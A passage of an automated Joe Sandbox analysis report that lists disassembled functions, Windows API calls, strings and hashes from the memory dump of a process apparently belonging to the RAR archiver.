                                                              • Part of subcall function 00007FF71D2D39E0: SetFileAttributesW.KERNEL32(?,00007FF71D2D34EE,?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2D3A3C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: File$Close$CreateHandle$AttributesDirectoryErrorLastProcessToken$AdjustBuffersChangeControlCurrentDeleteDeviceFindFlushLookupNotificationOpenPrivilegePrivilegesRemoveTimeValue
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 2827264287-3508440684
                                                            • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                            • Instruction ID: 2b58673a4a9e39686c389d0975f335c3d48a6f981125a8c4fd61571ed47e771b
                                                            • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                            • Instruction Fuzzy Hash: 5AD1C236A1CA8685EB20EF24D8502F9A3A0FB447A8F904135DA6D476D5FF3CD50ECB20
                                                            Function 00007FF71D2FAE50 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 281libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FAEE9
                                                            • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FAF01
                                                            • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FAF19
                                                            • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FAF75
                                                            • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FAFB0
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FB23B
                                                            • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FB244
                                                            • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FB287
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                            • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                            • API String ID: 3483800833-4165214152
                                                            • Opcode ID: 82dc930b34210fedd93bec5e1b637e758aa3da92834b2e3210ac5e6653bbd87a
                                                            • Instruction ID: 1a2218251afdd7fbbed5a62d8163886f9ed6d097ea730f2d1eb4e738933e1764
                                                            • Opcode Fuzzy Hash: 82dc930b34210fedd93bec5e1b637e758aa3da92834b2e3210ac5e6653bbd87a
                                                            • Instruction Fuzzy Hash: 0BC15F32A0DE8285EB14EF21D8502EEA7A0FF85BA4F844435DA5E47B95EF3CD549CB10
                                                            Function 00007FF71D2FB57C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54shutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 3729174658-3733053543
                                                            • Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                            • Instruction ID: 5e6e35e4cb28782ad9dcff56e864a78d4be43c26ee92d04bdcf2e38b1ddf55a7
                                                            • Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                            • Instruction Fuzzy Hash: 6B218132E1CE5282F790AB20E4553BAF261EB84764FD09039D95E06954EF3DD44D8F20
                                                            Function 00007FF71D2CE21C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF71D2B2014), ref: 00007FF71D2CE298
                                                            • FindClose.KERNEL32(?,?,?,00000001,?,00007FF71D2B2014), ref: 00007FF71D2CE2AB
                                                            • CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF71D2B2014), ref: 00007FF71D2CE2F7
                                                              • Part of subcall function 00007FF71D2CEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF71D2CEE47), ref: 00007FF71D2CEF73
                                                              • Part of subcall function 00007FF71D2CEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF71D2CEE47), ref: 00007FF71D2CEF84
                                                              • Part of subcall function 00007FF71D2CEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF71D2CEFA7
                                                              • Part of subcall function 00007FF71D2CEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF71D2CEFCA
                                                              • Part of subcall function 00007FF71D2CEF50: GetLastError.KERNEL32 ref: 00007FF71D2CEFD4
                                                              • Part of subcall function 00007FF71D2CEF50: CloseHandle.KERNEL32 ref: 00007FF71D2CEFE7
                                                            • DeviceIoControl.KERNEL32 ref: 00007FF71D2CE357
                                                            • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF71D2B2014), ref: 00007FF71D2CE362
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                            • String ID: SeBackupPrivilege
                                                            • API String ID: 3094086963-2429070247
                                                            • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                            • Instruction ID: 2f74da3abde9736c0bd4614a57b1e0d19d7675026c3e46521cca0e7f5e74c020
                                                            • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                            • Instruction Fuzzy Hash: 16619432A1CA8186E724AB15E4452F9E360FB447B4FC04239DB6E17AD4EF3CE559CB20
                                                            Function 00007FF71D2EAF0C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 427COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Sleepswprintf
                                                            • String ID: $%ls%0*u.rev
                                                            • API String ID: 407366315-3491873314
                                                            • Opcode ID: e3b4538fc488e6fa3eae94769406cf09f50ae20544565ed87ad815caa45bc0f7
                                                            • Instruction ID: 7e7b98179d98600a0ca7e10996f2f2a9757670c827bd6ddd5037b4953c700906
                                                            • Opcode Fuzzy Hash: e3b4538fc488e6fa3eae94769406cf09f50ae20544565ed87ad815caa45bc0f7
                                                            • Instruction Fuzzy Hash: 81020832A0CA9286EB20FF15D4542ADF3A5FB887A4F810135DE6D57795EE3CE449CB20
                                                            Function 00007FF71D2B49B8 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • new.LIBCMT ref: 00007FF71D2B4BD8
                                                              • Part of subcall function 00007FF71D2FB6D0: Sleep.KERNEL32(?,?,?,?,00007FF71D2CCBED,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2FB730
                                                              • Part of subcall function 00007FF71D2D1E80: CreateFileW.KERNELBASE ref: 00007FF71D2D1F4A
                                                              • Part of subcall function 00007FF71D2D1E80: GetLastError.KERNEL32 ref: 00007FF71D2D1F59
                                                              • Part of subcall function 00007FF71D2D1E80: CreateFileW.KERNELBASE ref: 00007FF71D2D1F99
                                                              • Part of subcall function 00007FF71D2D1E80: GetLastError.KERNEL32 ref: 00007FF71D2D1FA2
                                                              • Part of subcall function 00007FF71D2D1E80: SetFileTime.KERNEL32 ref: 00007FF71D2D1FF1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$SleepTime
                                                            • String ID: %12s %s$%12s %s$ $%s
                                                            • API String ID: 2965465231-221484280
                                                            • Opcode ID: 205973a013b23f23469f2857c4eaa0cafb1c0791afa8c1efee3731e28bb9fad9
                                                            • Instruction ID: 9b09a972e36586208794350009f9412976a745877516b6a1b717962fe6781826
                                                            • Opcode Fuzzy Hash: 205973a013b23f23469f2857c4eaa0cafb1c0791afa8c1efee3731e28bb9fad9
                                                            • Instruction Fuzzy Hash: D8F1B222B0DE4285EB60EB11D0902BEE751FB48BA8FC44435DA5D07785EFBCD65ACB20
                                                            Function 00007FF71D314C10 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                            • Instruction ID: 9b63bf34a8642a4f8cc2e0b614a5d0c27111c790a9266ee7fe727916a1aa12b3
                                                            • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                            • Instruction Fuzzy Hash: 2D314136618F81C6DB60DF25E8402AEF3A5FB84764F940139EA9D43B55EF38D159CB10
                                                            Function 00007FF71D2CEF50 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                            • String ID:
                                                            • API String ID: 3398352648-0
                                                            • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                            • Instruction ID: 03e52fd1b17eb2ac5f3555ced7731b02c26694963659877a1c4a3e709ff9611c
                                                            • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                            • Instruction Fuzzy Hash: 2F113032A1CB4186E750AF61F44056AF7A5FB88B90F944539EA8E43A28EF3CD44DCF50
                                                            Function 00007FF71D2B42E0 Relevance: 6.3, APIs: 4, Instructions: 344COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 3116915952-0
                                                            • Opcode ID: 182d738b03a18d4550a6de197fa6bd4041aa5ae2408643a047cd3678e056e4d0
                                                            • Instruction ID: a47a6110ce7fb2f2235f6ef73dd6d9c557b998d1cabf461b4779d6e5757782f4
                                                            • Opcode Fuzzy Hash: 182d738b03a18d4550a6de197fa6bd4041aa5ae2408643a047cd3678e056e4d0
                                                            • Instruction Fuzzy Hash: 46E17722A1CE8685EA20FB25D4501FDA361FF897A4F945032DE5D07796EE7CD60ACB20
                                                            Function 00007FF71D2D3A70 Relevance: 6.1, APIs: 4, Instructions: 74fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,?,?,00007FF71D2D11B0,?,?,?,00000000,?,?,00007FF71D2CF30F,00000000,00007FF71D2B6380,?,00007FF71D2B2EC8), ref: 00007FF71D2D3AC4
                                                            • CreateFileW.KERNEL32(?,?,?,00007FF71D2D11B0,?,?,?,00000000,?,?,00007FF71D2CF30F,00000000,00007FF71D2B6380,?,00007FF71D2B2EC8), ref: 00007FF71D2D3B0A
                                                            • DeviceIoControl.KERNEL32 ref: 00007FF71D2D3B55
                                                            • CloseHandle.KERNEL32(?,?,?,00007FF71D2D11B0,?,?,?,00000000,?,?,00007FF71D2CF30F,00000000,00007FF71D2B6380,?,00007FF71D2B2EC8), ref: 00007FF71D2D3B60
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CreateFile$CloseControlDeviceHandle
                                                            • String ID:
                                                            • API String ID: 998109204-0
                                                            • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                            • Instruction ID: 5d3b287e4493831462a299b8443226114bf726c60055acc31d3986cca481fbc4
                                                            • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                            • Instruction Fuzzy Hash: 1D318032A18E8186E6609F11F44469AF7A4FB887F4F404235EAA913BD4EF3CC5598F10
                                                            Function 00007FF71D2B8884 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 324COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CMT
                                                            • API String ID: 0-2756464174
                                                            • Opcode ID: a16dee74380204c9c30fa4e199fe9bf2e4989a6c72111b3352134e7331b26900
                                                            • Instruction ID: cf4f0187797cadf78f58ba54faca7d0772cecea6ff5ebd6b4826b095214c8a45
                                                            • Opcode Fuzzy Hash: a16dee74380204c9c30fa4e199fe9bf2e4989a6c72111b3352134e7331b26900
                                                            • Instruction Fuzzy Hash: 8BD11B62A0CE8285EA24FB21D4501BDE350FF497A0F944532DA6E477D5EFBCE249CB20
                                                            Function 00007FF71D3186D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF71D318704
                                                              • Part of subcall function 00007FF71D314E3C: GetCurrentProcess.KERNEL32(00007FF71D319CC5), ref: 00007FF71D314E69
                                                            Strings
                                                            Memory Dump Source
